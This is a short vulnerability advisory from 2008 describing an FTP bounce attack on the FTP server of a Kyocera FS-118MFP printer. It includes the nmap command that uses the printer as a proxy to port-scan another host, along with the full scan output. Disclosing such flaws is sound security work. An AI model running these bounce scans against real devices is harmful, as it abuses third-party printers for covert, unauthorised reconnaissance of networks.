Kyocera FTP Bounce

`Kyocera FTP Server Bounce Attack  
  
Version: I've tested this vulnerability to MontaVista Linux 3.0, Professional Edition (Linux/ppc 2.4.18_mvl30-kmmfp) embedded in Kyocera's printer (FS-118MFP) but I suppose that other Kyocera printers may be vulnerable  
  
Vulnerability: FTP Bounce Attack  
  
Risk: Critical  
  
Description (Wikipedia -http://en.wikipedia.org/wiki/FTP_bounce_attack-): In the field of computer networking and security, the FTP bounce attack is an exploit of the FTP protocol whereby an attacker is able to use the PORT command to request access to ports indirectly through the use of the victim machine as a middle man for the request.  
This technique can be used to port scan hosts discreetly, and to access specific ports that the attacker cannot access through a direct connection.  
nmap is a port scanner that can utilize an FTP bounce attack to scan other servers.  
Nowadays, nearly all FTP server programs are configured by default to refuse PORT commands that would connect to any host but the originating host, thwarting FTP bounce attacks.  
  
Example Bounce Attack:  
  
nmap -v -b :@1.1.1.88(printer_ip) 1.1.1.157(scan target)  
  
--  
Hint: if your bounce scan target hosts aren't reachable from here, remember to use -P0 so we don't try and ping them prior to the scan  
  
Starting Nmap 4.20 ( http://insecure.org ) at 2008-09-02 12:05 CEST  
Resolved ftp bounce attack proxy to g (1.1.1.88).  
Initiating Parallel DNS resolution of 1 host. at 12:05  
Completed Parallel DNS resolution of 1 host. at 12:05, 0.01s elapsed  
Attempting connection to ftp://:@1.1.1.88:21  
Connected:220 1.1.1.88 FTP server ready.  
Login credentials accepted by ftp server!  
Initiating TCP ftp bounce scan against 1.1.1.157 at 12:05  
Discovered open port 80/tcp on 1.1.1.157  
Discovered open port 443/tcp on 1.1.1.157  
Discovered open port 22/tcp on 1.1.1.157  
Discovered open port 6000/tcp on 1.1.1.157  
recv problem from ftp bounce server  
: Resource temporarily unavailable  
recv problem from ftp bounce server  
: Illegal seek  
recv problem from ftp bounce server  
: Illegal seek  
recv problem from ftp bounce server  
: Illegal seek  
recv problem from ftp bounce server  
: Illegal seek  
send in bounce_scan: Broken pipe  
Our ftp proxy server hung up on us! retrying  
Attempting connection to ftp://:@1.1.1.88:21  
Connected:220 1.1.1.88 FTP server ready.  
Login credentials accepted by ftp server!  
Scanned 1697 ports in 17 seconds via the Bounce scan.  
Host 1.1.1.157 appears to be up ... good.  
Interesting ports on 1.1.1.157:  
Not shown: 1688 closed ports  
PORT STATE SERVICE  
22/tcp open ssh  
80/tcp open http  
443/tcp open https  
6000/tcp open X11  
  
Nmap finished: 1 IP address (1 host up) scanned in 26.334 seconds  
Raw packets sent: 0 (0B) | Rcvd: 0 (0B)  
--   
  
Francesco Tornieri  
`